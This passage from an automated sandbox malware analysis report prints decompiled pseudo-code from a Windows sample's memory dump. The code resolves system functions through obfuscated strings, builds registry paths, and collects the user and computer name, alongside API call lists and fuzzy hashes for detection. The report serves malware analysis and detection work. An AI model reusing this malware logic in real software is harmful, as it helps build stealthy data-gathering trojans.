					HeapFree( *0xcfd238, 0, _t70);
					L48:
					return 0;
				}
			}

0x00cf2e55
0x00cf2e58
0x00cf2e78
0x00cf2e86
0x00cf2e86
0x00cf2e8b
0x00cf2ea5
0x00cf302c
0x00cf302e
0x00000000
0x00cf2eab
0x00cf2eab
0x00cf2eb2
0x00cf2ec8
0x00cf2eb4
0x00cf2eb4
0x00cf2ec1
0x00cf2ec1
0x00cf2ed2
0x00cf2ed4
0x00cf2ede
0x00cf2ee3
0x00cf2ee3
0x00cf2ede
0x00cf2eea
0x00cf2f00
0x00cf2eec
0x00cf2eec
0x00cf2ef9
0x00cf2ef9
0x00cf2f04
0x00cf2f06
0x00cf2f10
0x00cf2f15
0x00cf2f15
0x00cf2f10
0x00cf2f1c
0x00cf2f32
0x00cf2f1e
0x00cf2f1e
0x00cf2f2b
0x00cf2f2b
0x00cf2f36
0x00cf2f38
0x00cf2f42
0x00cf2f47
0x00cf2f47
0x00cf2f42
0x00cf2f4e
0x00cf2f64
0x00cf2f50
0x00cf2f50
0x00cf2f5d
0x00cf2f5d
0x00cf2f68
0x00cf2f6a
0x00cf2f74
0x00cf2f79
0x00cf2f79
0x00cf2f74
0x00cf2f80
0x00cf2f96
0x00cf2f82
0x00cf2f82
0x00cf2f8f
0x00cf2f8f
0x00cf2f9a
0x00cf2f9c
0x00cf2fa6
0x00cf2fab
0x00cf2fab
0x00cf2fa6
0x00cf2fb2
0x00cf2fc8
0x00cf2fb4
0x00cf2fb4
0x00cf2fc1
0x00cf2fc1
0x00cf2fcc
0x00cf2fce
0x00cf2fd1
0x00cf2fd2
0x00cf2fd9
0x00cf2fdb
0x00cf2fdc
0x00cf2fdc
0x00cf2fd9
0x00cf2fe3
0x00cf2ff9
0x00cf2fe5
0x00cf2fe5
0x00cf2ff2
0x00cf2ff2
0x00cf2ffd
0x00cf300b
0x00cf3015
0x00cf3015
0x00cf3022
0x00cf302f
0x00cf3033
0x00cf3033

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,00CF5068,?,63699BC3,00CF5068,?,63699BC3,00000005,00CFD00C,00000008,?,00CF5068), ref: 00CF2EDA
StrToIntExA.SHLWAPI(00000000,00000000,?,00CF5068,?,63699BC3,00CF5068,?,63699BC3,00000005,00CFD00C,00000008,?,00CF5068), ref: 00CF2F0C
StrToIntExA.SHLWAPI(00000000,00000000,?,00CF5068,?,63699BC3,00CF5068,?,63699BC3,00000005,00CFD00C,00000008,?,00CF5068), ref: 00CF2F3E
StrToIntExA.SHLWAPI(00000000,00000000,?,00CF5068,?,63699BC3,00CF5068,?,63699BC3,00000005,00CFD00C,00000008,?,00CF5068), ref: 00CF2F70
StrToIntExA.SHLWAPI(00000000,00000000,?,00CF5068,?,63699BC3,00CF5068,?,63699BC3,00000005,00CFD00C,00000008,?,00CF5068), ref: 00CF2FA2
HeapFree.KERNEL32(00000000,00CF5068,00CF5068,?,63699BC3,00CF5068,?,63699BC3,00000005,00CFD00C,00000008,?,00CF5068), ref: 00CF3022

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: b3865a8875d6e148de731e5a09e2f811308a47505e221adf09cb8699f485e4e8
Instruction ID: bcaed6e49093041c8b99a131b5cef727a67d6dfe258760b38bd9c101e4b5bebe
Opcode Fuzzy Hash: b3865a8875d6e148de731e5a09e2f811308a47505e221adf09cb8699f485e4e8
Instruction Fuzzy Hash: 4E51A670A20219AFCB90EBF5DD88E7F76BDAB487007750955B602D7115EA31DE00E763

Uniqueness

Uniqueness Score: -1.00%

Function 00CFA236, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 00CFA290
SysAllocString.OLEAUT32(0070006F), ref: 00CFA2A4
SysAllocString.OLEAUT32(00000000), ref: 00CFA2B6
SysFreeString.OLEAUT32(00000000), ref: 00CFA31E
SysFreeString.OLEAUT32(00000000), ref: 00CFA32D
SysFreeString.OLEAUT32(00000000), ref: 00CFA338

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: fd95b361ab68f95ba28270969e04d40fca12efe2032b972ea0dae012d4d165da
Instruction ID: c84bf922e159d146f1362736aa143ca79b3a2cb3b6e13e496cc2f27558b073a2
Opcode Fuzzy Hash: fd95b361ab68f95ba28270969e04d40fca12efe2032b972ea0dae012d4d165da
Instruction Fuzzy Hash: D541507290060DAFDB41DFB8D944AAEB7BAEF49310F144465EE14EB120DA71DE05CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00CF933F, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CF933F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00CF8D59(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xcfd2a4; // 0x247a5a8
					_t1 = _t23 + 0xcfe11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xcfd2a4; // 0x247a5a8
					_t2 = _t26 + 0xcfe769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00CF677C(_t54);
					} else {
						_t30 =  *0xcfd2a4; // 0x247a5a8
						_t5 = _t30 + 0xcfe756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xcfd2a4; // 0x247a5a8
							_t7 = _t33 + 0xcfe40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xcfd2a4; // 0x247a5a8
								_t9 = _t36 + 0xcfe4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xcfd2a4; // 0x247a5a8
									_t11 = _t39 + 0xcfe779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00CF5194(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00cf934e
0x00cf9352
0x00cf9414
0x00cf9358
0x00cf9358
0x00cf935d
0x00cf9370
0x00cf9372
0x00cf9377
0x00cf937f
0x00cf9386
0x00cf9388
0x00cf938d
0x00cf940c
0x00cf940d
0x00cf938f
0x00cf938f
0x00cf9394
0x00cf939c
0x00cf939e
0x00cf93a3
0x00000000
0x00cf93a5
0x00cf93a5
0x00cf93aa
0x00cf93b2
0x00cf93b4
0x00cf93b9
0x00000000
0x00cf93bb
0x00cf93bb
0x00cf93c0
0x00cf93c8
0x00cf93ca
0x00cf93cf
0x00000000
0x00cf93d1
0x00cf93d1
0x00cf93d6
0x00cf93de
0x00cf93e0
0x00cf93e5
0x00000000
0x00cf93e7
0x00cf93ed
0x00cf93f2
0x00cf93f9
0x00cf93fe
0x00cf9403
0x00000000
0x00cf9405
0x00cf9408
0x00cf9408
0x00cf9403
0x00cf93e5
0x00cf93cf
0x00cf93b9
0x00cf93a3
0x00cf938d
0x00cf9422

APIs

Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00CF8DB5,?,00000001,?,?,00000000,00000000), ref: 00CF9364
GetProcAddress.KERNEL32(00000000,7243775A), ref: 00CF9386
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00CF939C
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00CF93B2
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00CF93C8
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00CF93DE

Part of subcall function 00CF5194: memset.NTDLL ref: 00CF5213

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: b3600e843f6e39b8325fa3aa9602c864d00a4fbf2ad0ea1db7edff2db783c7bc
Instruction ID: dff4ce2e4eca848725d07502cb58593008ce122da9b2c8e809594c37a260b0ea
Opcode Fuzzy Hash: b3600e843f6e39b8325fa3aa9602c864d00a4fbf2ad0ea1db7edff2db783c7bc
Instruction Fuzzy Hash: EA211CB160060AEFDB51EF69CD84F7ABBECEF543047014466E619CB221D770EA06CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CF6791, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 173
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00CF6791(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				void _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t96;
				void* _t97;
				int _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t97 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0xcfd33c);
					_t96 = 0x80000002;
					L6:
					_t60 = E00CF978C(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					if(E00CFA0A7(_t97, _t105, _t96, _t60) != 0) {
						L27:
						E00CF677C(_a8);
						goto L29;
					}
					_t65 =  *0xcfd2a4; // 0x247a5a8
					_t16 = _t65 + 0xcfe8fe; // 0x65696c43
					_t68 = E00CF978C(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t33 = _t105 + 0x10; // 0x3d00cfc0
						if(E00CF66BD( *_t33, _t96, _a8,  *0xcfd334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0xcfd2a4; // 0x247a5a8
							if(_t102 == 0) {
								_t35 = _t72 + 0xcfea5f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0xcfe89f; // 0x55434b48
								_t73 = _t34;
							}
							if(E00CF15EE( &_a24, _t73,  *0xcfd334,  *0xcfd338,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t75 =  *0xcfd2a4; // 0x247a5a8
									_t44 = _t75 + 0xcfe871; // 0x74666f53
									_t78 = E00CF978C(0, _t44);
									_t103 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d00cfc0
										E00CF5931( *_t47, _t96, _a8,  *0xcfd338, _a24);
										_t49 = _t105 + 0x10; // 0x3d00cfc0
										E00CF5931( *_t49, _t96, _t103,  *0xcfd330, _a16);
										E00CF677C(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d00cfc0
									E00CF5931( *_t40, _t96, _a8,  *0xcfd338, _a24);
									_t43 = _t105 + 0x10; // 0x3d00cfc0
									E00CF5931( *_t43, _t96, _a8,  *0xcfd330, _a16);
								}
								if( *_t105 != 0) {
									E00CF677C(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d00cfc0
					if(E00CF63A4( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t104 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t104 =  *_t104 & 0x00000000;
							_t26 = _t105 + 0x10; // 0x3d00cfc0
							E00CF66BD( *_t26, _t96, _a8, _a24, _t104);
						}
						E00CF677C(_t104);
						_t102 = _a16;
					}
					E00CF677C(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					memcpy( &_v284, _a8, _t102);
					__imp__(_t106 + _t102 - 0x117,  *0xcfd33c);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t96 = 0x80000003;
					goto L6;
				}
			}

0x00cf6791
0x00cf679a
0x00cf67a1
0x00cf67a6
0x00cf6815
0x00cf681b
0x00cf6820
0x00cf6829
0x00cf682e
0x00cf6833
0x00cf69a7
0x00cf69ae
0x00cf69ae
0x00cf69b3
0x00cf69b5
0x00cf69b5
0x00cf69be
0x00cf69be
0x00cf6839
0x00cf6845
0x00cf699d
0x00cf69a0
0x00000000
0x00cf69a0
0x00cf684b
0x00cf6850
0x00cf6859
0x00cf685e
0x00cf6863
0x00cf68ad
0x00cf68ad
0x00cf68c0
0x00cf68ca
0x00cf68d0
0x00cf68d7
0x00cf68e1
0x00cf68e1
0x00cf68d9
0x00cf68d9
0x00cf68d9
0x00cf68d9
0x00cf6903
0x00cf690b
0x00cf6939
0x00cf693e
0x00cf6947
0x00cf694c
0x00cf6950
0x00cf6982
0x00cf6952
0x00cf695f
0x00cf6962
0x00cf6972
0x00cf6975
0x00cf697b
0x00cf697b
0x00cf690d
0x00cf691a
0x00cf691d
0x00cf692f
0x00cf6932
0x00cf6932
0x00cf698c
0x00cf6998
0x00cf698e
0x00cf6991
0x00cf6991
0x00cf698c
0x00cf6903
0x00000000
0x00cf68ca
0x00cf6872
0x00cf687c
0x00cf687e
0x00cf6883
0x00cf6887
0x00cf6889
0x00cf6894
0x00cf6897
0x00cf6897
0x00cf689d
0x00cf68a2
0x00cf68a2
0x00cf68a8
0x00000000
0x00cf68a8
0x00cf67ab
0x00000000
0x00cf67d2
0x00cf67dd
0x00cf67f3
0x00cf67f9
0x00cf6801
0x00000000
0x00cf6801

APIs

StrChrA.SHLWAPI(00CF4D4E,0000005F,00000000,00000000,00000104), ref: 00CF67C4
memcpy.NTDLL(?,00CF4D4E,?), ref: 00CF67DD
lstrcpy.KERNEL32(?), ref: 00CF67F3

Part of subcall function 00CF978C: lstrlen.KERNEL32(?,00000000,00CFD330,00000001,00CF3435,00CFD00C,00CFD00C,00000000,00000005,00000000,00000000,?,?,?,00CF568F,00CF5073), ref: 00CF9795
Part of subcall function 00CF978C: mbstowcs.NTDLL ref: 00CF97BC
Part of subcall function 00CF978C: memset.NTDLL ref: 00CF97CE

Part of subcall function 00CF5931: lstrlenW.KERNEL32(00CF4D4E,?,?,00CF6967,3D00CFC0,80000002,00CF4D4E,00CF2227,74666F53,4D4C4B48,00CF2227,?,3D00CFC0,80000002,00CF4D4E,?), ref: 00CF5951

Part of subcall function 00CF677C: HeapFree.KERNEL32(00000000,00000000,00CF9161,00000000,?,?,00000000), ref: 00CF6788

lstrcpy.KERNEL32(?,00000000), ref: 00CF6815

Strings

\, xrefs: 00CF67F9

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
String ID: \
API String ID: 2598994505-2967466578
Opcode ID: 8c394b434b79c7fe6eede2eadf8cb316f7a6ddda1e691e1db3100726673b30c9
Instruction ID: 26cd2e1504425f298861ebf3c9b84cbeb3b811aa8a85904684cfd36233d1eb0c
Opcode Fuzzy Hash: 8c394b434b79c7fe6eede2eadf8cb316f7a6ddda1e691e1db3100726673b30c9
Instruction Fuzzy Hash: D051597210020EEFDF51AFA0DD40EBE7BBAEB48300F104519FB2696161D732DA25EB12

Uniqueness

Uniqueness Score: -1.00%

Function 00CF26A0, Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CF26A0() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E00CF8D59(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E00CF677C(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0xcf1e0d
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x00cf26ae
0x00cf26b1
0x00cf26b4
0x00cf26ba
0x00cf26bf
0x00cf26c5
0x00cf26cd
0x00cf26d0
0x00cf26d6
0x00cf26db
0x00cf26e8
0x00cf26f5
0x00cf26f9
0x00cf26fb
0x00cf26ff
0x00cf2702
0x00cf2712
0x00cf2765
0x00cf2766
0x00cf2714
0x00cf2719
0x00cf271a
0x00cf271f
0x00cf2722
0x00cf2735
0x00000000
0x00cf2737
0x00cf273a
0x00cf273f
0x00cf274d
0x00cf2750
0x00cf2756
0x00cf275b
0x00000000
0x00cf275d
0x00cf275d
0x00cf2760
0x00cf2760
0x00cf275b
0x00cf2735
0x00cf276b
0x00cf276c
0x00cf26db
0x00cf2772

APIs

GetUserNameW.ADVAPI32(00000000,00CF1E0B), ref: 00CF26B4
GetComputerNameW.KERNEL32(00000000,00CF1E0B), ref: 00CF26D0

Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65

GetUserNameW.ADVAPI32(00000000,00CF1E0B), ref: 00CF270A
GetComputerNameW.KERNEL32(00CF1E0B,?), ref: 00CF272D
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00CF1E0B,00000000,00CF1E0D,00000000,00000000,?,?,00CF1E0B), ref: 00CF2750

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: 438bf7b7c4406c6c8857609c54d62cf52baa31694c64b5bdf2f083e191b9bd6e
Instruction ID: 4446a17a3e291253640a9328f725969a012f5b10f71cfc9e304f00b5faa4e861
Opcode Fuzzy Hash: 438bf7b7c4406c6c8857609c54d62cf52baa31694c64b5bdf2f083e191b9bd6e
Instruction Fuzzy Hash: 4F21D876900208FFCB11DFE9DA85EBEBBB8EF48704B1044AAE601E7251DA309B45DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00CF6A9A, Relevance: 7.6, APIs: 5, Instructions: 75
networkCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00CF6A9A(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				intOrPtr* _t38;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E00CF9837(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_t38 = E00CFD134; // 0xcfad51
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					 *_t38( *(_t45 + 0x18));
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					 *_t38( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					 *_t38( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E00CF677C(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E00CF677C(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E00CF677C(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E00CF677C(_t46);
				}
				return _t24;
			}

0x00cf6a9a
0x00cf6a9a
0x00cf6a9c
0x00cf6a9e
0x00cf6aa5
0x00cf6aac
0x00cf6aac
0x00cf6ab1
0x00cf6ab4
0x00cf6ab5
0x00cf6abb
0x00cf6ac4
0x00cf6ac8
0x00cf6acd
0x00cf6acd
0x00cf6acf
0x00cf6ad4
0x00cf6ad8
0x00cf6add
0x00cf6add
0x00cf6adf
0x00cf6ae4
0x00cf6ae8
0x00cf6aed
0x00cf6aed
0x00cf6aef
0x00cf6afa
0x00cf6afd
0x00cf6afd
0x00cf6aff
0x00cf6b04
0x00cf6b07
0x00cf6b07
0x00cf6b09
0x00cf6b10
0x00cf6b13
0x00cf6b18
0x00cf6b1b
0x00cf6b1b
0x00cf6b1e
0x00cf6b23
0x00cf6b26
0x00cf6b26
0x00cf6b2b
0x00cf6b2f
0x00cf6b32
0x00cf6b32
0x00cf6b37
0x00cf6b3c
0x00000000
0x00cf6b3f
0x00cf6b46

APIs

InternetSetStatusCallback.WININET(?,00000000), ref: 00CF6AC8
InternetSetStatusCallback.WININET(?,00000000), ref: 00CF6AD8
InternetSetStatusCallback.WININET(?,00000000), ref: 00CF6AE8
CloseHandle.KERNEL32(?,00000000,00000102,?,?,00CF3392,?,?,00000000,00000000,74B481D0), ref: 00CF6AFD
CloseHandle.KERNEL32(?,00000000,00000102,?,?,00CF3392,?,?,00000000,00000000,74B481D0), ref: 00CF6B07

Part of subcall function 00CF9837: WaitForMultipleObjects.KERNEL32(00000002,00CFA9FB,00000000,00CFA9FB,?,?,?,00CFA9FB,0000EA60), ref: 00CF9852

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: CallbackInternetStatus$CloseHandle$MultipleObjectsWait
String ID:
API String ID: 3686715076-0
Opcode ID: 0dd97a9a1e645a2a84428df9d2716055af9f3adb01e4d140649900d966a7466e
Instruction ID: fe2d78a990e64685717e8d4dd6f95d544372165df3359369d32d8bb38be6f074
Opcode Fuzzy Hash: 0dd97a9a1e645a2a84428df9d2716055af9f3adb01e4d140649900d966a7466e
Instruction Fuzzy Hash: C0113A7660064CABC670AFAADC84C2BF7FDEF483043554D19F296E3520C721FC44AA62

Uniqueness

Uniqueness Score: -1.00%

Function 00CF57EF, Relevance: 7.6, APIs: 5, Instructions: 75
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00CF57EF(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t35;
				void* _t40;
				char* _t41;
				void* _t43;
				void* _t48;
				char _t49;
				int _t50;
				int _t53;
				void* _t54;

				_t48 = _a4;
				_t54 = __eax;
				_v12 = 0xb;
				if(_t48 != 0 && __eax != 0) {
					_t5 = _t54 - 1; // -1
					_t41 = _t48 + _t5;
					_t28 =  *_t41;
					_v5 = _t28;
					 *_t41 = 0;
					__imp__(_a8, _t40);
					_push(_a8);
					_v16 = _t28;
					_push(_t48);
					E00CFD114();
					_t49 = _t28;
					if(_t49 != 0) {
						 *_t41 = _v5;
						_t43 = RtlAllocateHeap( *0xcfd238, 0, _a16 + __eax);
						if(_t43 == 0) {
							_v12 = 8;
						} else {
							_t50 = _t49 - _a4;
							memcpy(_t43, _a4, _t50);
							_t35 = memcpy(_t43 + _t50, _a12, _a16);
							_t44 = _v16;
							_t53 = _a16;
							memcpy(_t35 + _t53, _t50 + _v16 + _a4, _t54 - _t50 - _t44);
							 *_a20 = _t43;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t54 - _v16 + _t53;
						}
					}
				}
				return _v12;
			}

0x00cf57f7
0x00cf57fa
0x00cf57fc
0x00cf5805
0x00cf5817
0x00cf5817
0x00cf581b
0x00cf581d
0x00cf5820
0x00cf5823
0x00cf5829
0x00cf582c
0x00cf582f
0x00cf5830
0x00cf5836
0x00cf583a
0x00cf583f
0x00cf5855
0x00cf5859
0x00cf58aa
0x00cf585b
0x00cf585b
0x00cf5863
0x00cf5872
0x00cf5877
0x00cf5887
0x00cf588d
0x00cf5898
0x00cf58a2
0x00cf58a6
0x00cf58a6
0x00cf5859
0x00cf58b1
0x00cf58b8

APIs

lstrlen.KERNEL32(74B5F710,?,00000000,?,74B5F710), ref: 00CF5823
RtlAllocateHeap.NTDLL(00000000,?), ref: 00CF584F
memcpy.NTDLL(00000000,0000000B,0000000B), ref: 00CF5863
memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00CF5872
memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00CF588D

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 891443cace4a95de66063c29acb30efc363b429a1f9a18ae39eba141d281c9db
